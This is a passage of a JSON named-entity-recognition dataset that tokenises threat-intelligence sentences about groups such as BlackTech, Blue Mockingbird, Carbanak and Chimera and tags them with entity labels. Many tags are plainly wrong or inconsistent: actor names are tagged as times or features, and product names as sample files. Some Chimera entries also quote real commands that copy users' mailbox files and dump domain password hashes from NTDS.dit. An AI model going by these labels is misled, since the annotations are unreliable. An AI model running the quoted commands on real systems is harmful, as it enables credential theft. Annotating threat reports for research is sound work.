"PortQry", - "to", - "enumerate", - "network", - "connections", - "and", - "display", - "the", - "status", - "of", - "related", - "TCP", - "and", - "UDP", - "ports." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "BackdoorDiplomacy", - "has", - "obtained", - "a", - "variety", - "of", - "open-source", - "reconnaissance", - "and", - "red", - "team", - "tools", - "for", - "discovery", - "and", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackdoorDiplomacy", - "has", - "used", - "web", - "shells", - "to", - "establish", - "an", - "initial", - "foothold", - "and", - "for", - "lateral", - "movement", - "within", - "a", - "victim's", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackOasis's", - "first", - "stage", - "shellcode", - "contains", - "a", - "NOP", - "sled", - "with", - "alternative", - "instructions", - "that", - "was", - "likely", - "designed", - "to", - "bypass", - "antivirus", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackTech", - "has", - "used", - "stolen", - "code-signing", - "certificates", - "for", - "its", - "malicious", - "payloads." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-OffAct", - "B-Purp", - "B-OffAct", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackTech", - "has", - "used", - "DLL", - "side", - "loading", - "by", - "giving", - "DLLs", - "hardcoded", - "names", - "and", - "placing", - "them", - "in", - "searched", - "directories." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "I-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackTech", - "has", - "used", - "valid,", - "stolen", - "digital", - "certificates", - "for", - "some", - "of", - "their", - "malware", - "and", - "tools." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackTech", - "has", - "exploited", - "a", - "buffer", - "overflow", - "vulnerability", - "in", - "Microsoft", - "Internet", - "Information", - "Services", - "(IIS)", - "6.0,", - "CVE-2017-7269,", - "in", - "order", - "to", - "establish", - "a", - "new", - "HTTP", - "or", - "command", - "and", - "control", - "(C2)", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Exp", - "O", - "B-Exp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackTech", - "has", - "exploited", - "multiple", - "vulnerabilities", - "for", - "execution,", - "including", - "Microsoft", - "Office", - "vulnerabilities", - "CVE-2012-0158,", - "CVE-2014-6352,", - "CVE-2017-0199,", - "and", - "Adobe", - "Flash", - "CVE-2015-5119." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Exp", - "I-Exp", - "I-Exp", - "B-Features", - "B-Features", - "B-Features", - "O", - "I-Tool", - "I-Tool", - "B-Features" - ] - }, - { - "tokens": [ - "BlackTech", - "has", - "used", - "e-mails", - "with", - "malicious", - "documents", - "to", - "lure", - "victims", - "into", - "installing", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackTech", - "has", - "used", - "e-mails", - "with", - "malicious", - "links", - "to", - "lure", - "victims", - "into", - "installing", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackTech", - "has", - "used", - "built-in", - "API", - "functions." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackTech", - "has", - "used", - "the", - "SNScan", - "tool", - "to", - "find", - "other", - "potential", - "targets", - "on", - "victim", - "networks." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackTech", - "has", - "used", - "right-to-left-override", - "to", - "obfuscate", - "the", - "filenames", - "of", - "malicious", - "e-mail", - "attachments." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "BlackTech", - "has", - "used", - "Putty", - "for", - "remote", - "access." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "BlackTech", - "has", - "used", - "spearphishing", - "e-mails", - "with", - "malicious", - "password-protected", - "archived", - "files", - "(ZIP", - "or", - "RAR)", - "to", - "deliver", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackTech", - "has", - "used", - "spearphishing", - "e-mails", - "with", - "links", - "to", - "cloud", - "services", - "to", - "deliver", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackTech", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "Putty,", - "SNScan,", - "and", - "PsExec", - "for", - "its", - "operations." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "used", - "JuicyPotato", - "to", - "abuse", - "the", - "<code>SeImpersonate</code>", - "token", - "privilege", - "to", - "escalate", - "from", - "web", - "application", - "pool", - "accounts", - "to", - "NT", - "Authority\\SYSTEM." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "used", - "wmic.exe", - "and", - "Windows", - "Registry", - "modifications", - "to", - "set", - "the", - "COR_PROFILER", - "environment", - "variable", - "to", - "execute", - "a", - "malicious", - "DLL", - "whenever", - "a", - "process", - "loads", - "the", - ".NET", - "CLR." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "obfuscated", - "the", - "wallet", - "address", - "in", - "the", - "payload", - "binary." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "gained", - "initial", - "access", - "by", - "exploiting", - "CVE-2019-18935,", - "a", - "vulnerability", - "within", - "Telerik", - "UI", - "for", - "ASP.NET", - "AJAX." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "used", - "Mimikatz", - "to", - "retrieve", - "credentials", - "from", - "LSASS", - "memory." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "masqueraded", - "their", - "XMRIG", - "payload", - "name", - "by", - "naming", - "it", - "wercplsupporte.dll", - "after", - "the", - "legitimate", - "wercplsupport.dll", - "file." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "used", - "Windows", - "Registry", - "modifications", - "to", - "specify", - "a", - "DLL", - "payload." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "used", - "PowerShell", - "reverse", - "TCP", - "shells", - "to", - "issue", - "interactive", - "commands", - "over", - "a", - "network", - "connection." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "used", - "frp,", - "ssf,", - "and", - "Venom", - "to", - "establish", - "SOCKS", - "proxy", - "connections." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "executed", - "custom-compiled", - "XMRIG", - "miner", - "DLLs", - "using", - "regsvr32.exe." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "used", - "Remote", - "Desktop", - "to", - "log", - "on", - "to", - "servers", - "interactively", - "and", - "manually", - "copy", - "files", - "to", - "remote", - "hosts." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "used", - "XMRIG", - "to", - "mine", - "cryptocurrency", - "on", - "victim", - "systems." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "executed", - "custom-compiled", - "XMRIG", - "miner", - "DLLs", - "using", - "rundll32.exe." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "used", - "Windows", - "Explorer", - "to", - "manually", - "copy", - "malicious", - "files", - "to", - "remote", - "hosts", - "over", - "SMB." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "used", - "Windows", - "Scheduled", - "Tasks", - "to", - "establish", - "persistence", - "on", - "local", - "and", - "remote", - "hosts." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "executed", - "custom-compiled", - "XMRIG", - "miner", - "DLLs", - "by", - "configuring", - "them", - "to", - "execute", - "via", - "the", - "\"wercplsupport\"", - "service." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "collected", - "hardware", - "details", - "for", - "the", - "victim's", - "system,", - "including", - "CPU", - "and", - "memory", - "information." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "Mimikatz." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "used", - "batch", - "script", - "files", - "to", - "automate", - "execution", - "and", - "deployment", - "of", - "payloads." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "used", - "wmic.exe", - "to", - "set", - "environment", - "variables." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "used", - "mofcomp.exe", - "to", - "establish", - "WMI", - "Event", - "Subscription", - "persistence", - "mechanisms", - "configured", - "from", - "a", - "*.mof", - "file." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Blue", - "Mockingbird", - "has", - "made", - "their", - "XMRIG", - "payloads", - "persistent", - "as", - "a", - "Windows", - "Service." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CURIUM", - "has", - "exfiltrated", - "data", - "from", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CURIUM", - "has", - "lured", - "users", - "into", - "opening", - "malicious", - "files", - "delivered", - "via", - "social", - "media." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "I-Idus", - "O" - ] - }, - { - "tokens": [ - "CURIUM", - "has", - "established", - "a", - "network", - "of", - "fictitious", - "social", - "media", - "accounts,", - "including", - "on", - "Facebook", - "and", - "LinkedIn,", - "to", - "establish", - "relationships", - "with", - "victims,", - "often", - "posing", - "as", - "an", - "attractive", - "woman." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CURIUM", - "has", - "used", - "social", - "media", - "to", - "deliver", - "malicious", - "files", - "to", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "has", - "used", - "a", - "VBScript", - "named", - "\"ggldr\"", - "that", - "uses", - "Google", - "Apps", - "Script,", - "Sheets,", - "and", - "Forms", - "services", - "for", - "C2." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "may", - "use", - "netsh", - "to", - "add", - "local", - "firewall", - "rule", - "exceptions." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "has", - "copied", - "legitimate", - "service", - "names", - "to", - "use", - "for", - "malicious", - "services." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "has", - "named", - "malware", - "\"svchost.exe,\"", - "which", - "is", - "the", - "name", - "of", - "the", - "Windows", - "shared", - "service", - "host", - "program." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "used", - "legitimate", - "programs", - "such", - "as", - "AmmyyAdmin", - "and", - "Team", - "Viewer", - "for", - "remote", - "interactive", - "C2", - "to", - "target", - "systems." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "installs", - "VNC", - "server", - "software", - "that", - "executes", - "through", - "rundll32." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "has", - "obtained", - "and", - "used", - "open-source", - "tools", - "such", - "as", - "PsExec", - "and", - "Mimikatz." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Carbanak", - "actors", - "used", - "legitimate", - "credentials", - "of", - "banking", - "employees", - "to", - "perform", - "operations", - "that", - "sent", - "them", - "millions", - "of", - "dollars." - ], - "ner_tags": [ - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "Carbanak", - "malware", - "installs", - "itself", - "as", - "a", - "service", - "to", - "provide", - "persistence", - "and", - "SYSTEM", - "privileges." - ], - "ner_tags": [ - "B-Features", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "gzip", - "for", - "Linux", - "OS", - "and", - "a", - "modified", - "RAR", - "software", - "to", - "archive", - "data", - "on", - "Windows", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "custom", - "DLLs", - "for", - "continuous", - "retrieval", - "of", - "data", - "from", - "memory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "<code>type", - "\\\\<hostname>\\c$\\Users\\<username>\\Favorites\\Links\\Bookmarks", - "bar\\Imported", - "From", - "IE\\*citrix*</code>", - "for", - "bookmark", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "cleared", - "event", - "logs", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "encoded", - "PowerShell", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "credential", - "stuffing", - "against", - "victim's", - "remote", - "services", - "to", - "obtain", - "valid", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "collected", - "credentials", - "for", - "the", - "target", - "organization", - "from", - "previous", - "breaches", - "for", - "use", - "in", - "brute", - "force", - "attacks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "side", - "loading", - "to", - "place", - "malicious", - "DLLs", - "in", - "memory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "Cobalt", - "Strike", - "to", - "encapsulate", - "C2", - "in", - "DNS", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "collected", - "data", - "of", - "interest", - "from", - "network", - "shares." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "has", - "used", - "<code>net", - "user", - "/dom</code>", - "and", - "<code>net", - "user", - "Administrator</code>", - "to", - "enumerate", - "domain", - "accounts", - "including", - "administrator", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "compromised", - "domain", - "accounts", - "to", - "gain", - "access", - "to", - "the", - "target", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera's", - "malware", - "has", - "altered", - "the", - "NTLM", - "authentication", - "program", - "on", - "domain", - "controllers", - "to", - "allow", - "Chimera", - "to", - "login", - "without", - "a", - "valid", - "credential." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "<code>nltest", - "/domain_trusts</code>", - "to", - "identify", - "domain", - "trust", - "relationships." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "Cobalt", - "Strike", - "C2", - "beacons", - "for", - "data", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "exfiltrated", - "stolen", - "data", - "to", - "OneDrive", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "legitimate", - "credentials", - "to", - "login", - "to", - "an", - "external", - "VPN,", - "Citrix,", - "SSH,", - "and", - "other", - "remote", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "performed", - "file", - "deletion", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "utilized", - "multiple", - "commands", - "to", - "identify", - "data", - "of", - "interest", - "in", - "file", - "and", - "directory", - "listings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "remotely", - "copied", - "tools", - "and", - "malware", - "onto", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "copied", - "tools", - "between", - "compromised", - "hosts", - "using", - "SMB." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "<code>net", - "user</code>", - "for", - "account", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "staged", - "stolen", - "data", - "locally", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "harvested", - "data", - "from", - "victim's", - "e-mail", - "including", - "through", - "execution", - "of", - "<code>wmic", - "/node:<ip>", - "process", - "call", - "create", - "\"cmd", - "/c", - "copy", - "c:\\Users\\<username>\\<path>\\backup.pst", - "c:\\windows\\temp\\backup.pst\"", - "copy", - "\"i:\\<path>\\<username>\\My", - "Documents\\<filename>.pst\"", - "copy</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "<code>net", - "localgroup", - "administrators</code>", - "to", - "identify", - "accounts", - "with", - "local", - "administrative", - "rights." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "renamed", - "malware", - "to", - "GoogleUpdate.exe", - "and", - "WinRAR", - "to", - "jucheck.exe,", - "RecordedTV.ms,", - "teredo.tmp,", - "update.exe,", - "and", - "msadcs1.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "registered", - "alternate", - "phone", - "numbers", - "for", - "compromised", - "users", - "to", - "intercept", - "2FA", - "codes", - "sent", - "via", - "SMS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "gathered", - "the", - "SYSTEM", - "registry", - "and", - "ntds.dit", - "files", - "from", - "target", - "systems.", - "Chimera", - "specifically", - "has", - "used", - "the", - "NtdsAudit", - "tool", - "to", - "dump", - "the", - "password", - "hashes", - "of", - "domain", - "users", - "via", - "<code>msadcs.exe", - "\"NTDS.dit\"", - "-s", - "\"SYSTEM\"", - "-p", - "RecordedTV_pdmp.txt", - "--users-csv", - "RecordedTV_users.csv</code>", - "and", - "used", - "ntdsutil", - "to", - "copy", - "the", - "Active", - "Directory", - "database." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "direct", - "Windows", - "system", - "calls", - "by", - "leveraging", - "Dumpert." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "the", - "<code>get", - "-b", - "<start", - "ip>", - "-e", - "<end", - "ip>", - "-p</code>", - "command", - "for", - "network", - "scanning", - "as", - "well", - "as", - "a", - "custom", - "Python", - "tool", - "packed", - "into", - "a", - "Windows", - "executable", - "named", - "Get.exe", - "to", - "scan", - "IP", - "ranges", - "for", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "<code>net", - "share</code>", - "and", - "<code>net", - "view</code>", - "to", - "identify", - "network", - "shares", - "of", - "interest." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - 